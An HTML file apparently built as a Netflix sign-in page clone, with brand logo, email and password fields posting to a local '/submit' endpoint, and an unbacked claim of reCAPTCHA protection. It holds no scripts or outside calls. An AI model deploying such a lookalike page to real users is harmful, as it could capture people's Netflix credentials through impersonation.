<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Netflix Sign in Page</title>
    <link rel="icon" type="image/x-icon" href="netflix_logo_icon_170919.ico">
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="logo">
        <img src="logo.png" alt="">
    </div>

        <div class="container">
            <h1>Sign In</h1>
            <form action="/submit"class="form" method="POST">
                <input name="email"class="email"type="email" placeholder="Email or phone number">
                <input name="pass"class="password"type="password" placeholder="Password">
                <input type="submit" value="Sign In">
                <p>Forget password?</p>
                <input type="checkbox">
                <label>Remember me</label>
                <a href="#">Need help?</a>
            </form>
            <div class="content">
                <h2>New to Netflix? <a href="#">Sign up now.</a> </h2> <br>
                <h2>This page is protected by Google reCAPTCHA to ensure you're not a bot. Learn more.</h2>
            </div>
        </div>
    
</body>
</html>